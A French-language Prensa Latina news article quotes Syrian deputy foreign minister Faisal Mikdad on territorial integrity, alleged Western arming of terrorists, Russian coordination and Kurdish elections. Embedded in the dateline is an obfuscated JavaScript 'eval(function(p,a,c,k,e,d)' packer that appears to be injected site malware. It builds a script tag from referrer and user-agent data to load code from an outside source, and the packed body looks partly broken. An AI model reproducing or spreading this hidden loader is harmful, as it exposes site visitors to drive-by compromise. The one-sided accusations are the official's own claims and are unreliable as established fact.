mardi 16 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

La Syrie maintient le principe d´intégrité territoriale

Damas, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|shfnb|var|u0026u|referrer|ehasr||js|php'.split('|'),0,{})) 8 août (PL) Lors d´un entretien avec des médias, le vice-ministre des Relations Extérieures, Faisal Mikdad, a affirmé que « la Syrie maintient le principe de son absolue intégrité territoriale ».

Damas, 8 août (PL) Lors d´un entretien avec des médias, le vice-ministre des Relations Extérieures, Faisal Mikdad, a affirmé que « la Syrie maintient le principe de son absolue intégrité territoriale ».

« La Syrie ne fera aucune concession relative à l´intégrité territoriale et l´unité du peuple syrien. Elle ne renoncera ni à un seul grain de terre des 185 mille kilomètres carrés du territoire », a-t-il précisé.

Mikdad a indiqué que « la victoire obtenue à Sukhneh ouvrira le chemin pour poursuivre vers Deir Ezzor, ville assiégée par les terroristes de DAESH, et qui se trouve sans nourriture, eau et médicaments ».

Il a expliqué que la dénommée « Coalition Internationale » a démontré par ses bombardements contre les forces de l´Armée Arabe Syrienne, à Tanef tout comme à Thardah près de Deir Ezzor, ou en abattant un avion de combat syrien, qu´elle collabore avec les forces terroristes.

Le vice-titulaire a assuré que « ceux qui veulent combattre le terrorisme ne peuvent pas frapper l´Armée syrienne et ses alliés ».

Au sujet de l´approvisionnement en armes des terroristes par les États-Unis, il a fait allusion à l´existence d´un programme secret du gouvernement de ce pays destiné à soutenir les extrémistes, et par lequel ils approvisionnent ces groupes en substances chimiques, explosifs, projectiles et bombes.

Puis il a exprimé que la Syrie accueille avec approbation le fait que ce « programme soit terminé, comme nous avons pu écouter et lire dans les médias ».

Quant au rôle britannique en Syrie, Mekdad a dit qu´il était « bien connu pour l´approvisionnement en armes des terroristes », et que « de nombreux fonctionnaires britanniques expriment avec fierté leur relation avec les extrémistes armés en Syrie ».

À ce sujet il a rajouté que « nous avons des données qui montrent, sans aucun doute possible, que les pays occidentaux, en général, sont impliqués dans le soutien aux groupes terroristes armés en les approvisionnant jusqu’en substances chimiques pour qu´ils les utilisent, et ensuite inculper le Gouvernement syrien ».

D´autre part, il a réaffirmé qu´il « existe une coordination quotidienne entre la Syrie et la Russie sur différents sujets, et Damas connaît d´avance toutes les mesures que Moscou annonce, car les amis russes sont ceux qui veillent le plus à l´unité du territoire et du peuple de Syrie ».

En référence aux kurdes et leur proposition d’organiser des élections municipales dans certaines zones de Syrie, Mekdad a commenté : « les circonstances actuelles permettent à certains d´aller trop loin dans leur imagination, ou dans leurs rêves diaboliques, et cela est une erreur ».

Il a terminé en assurant que « Damas ne reconnaît que les conseils locaux créés par le Gouvernement de la République Arabe de Syrie ».

peo/oda/pgh

EN CONTINU
notes connexes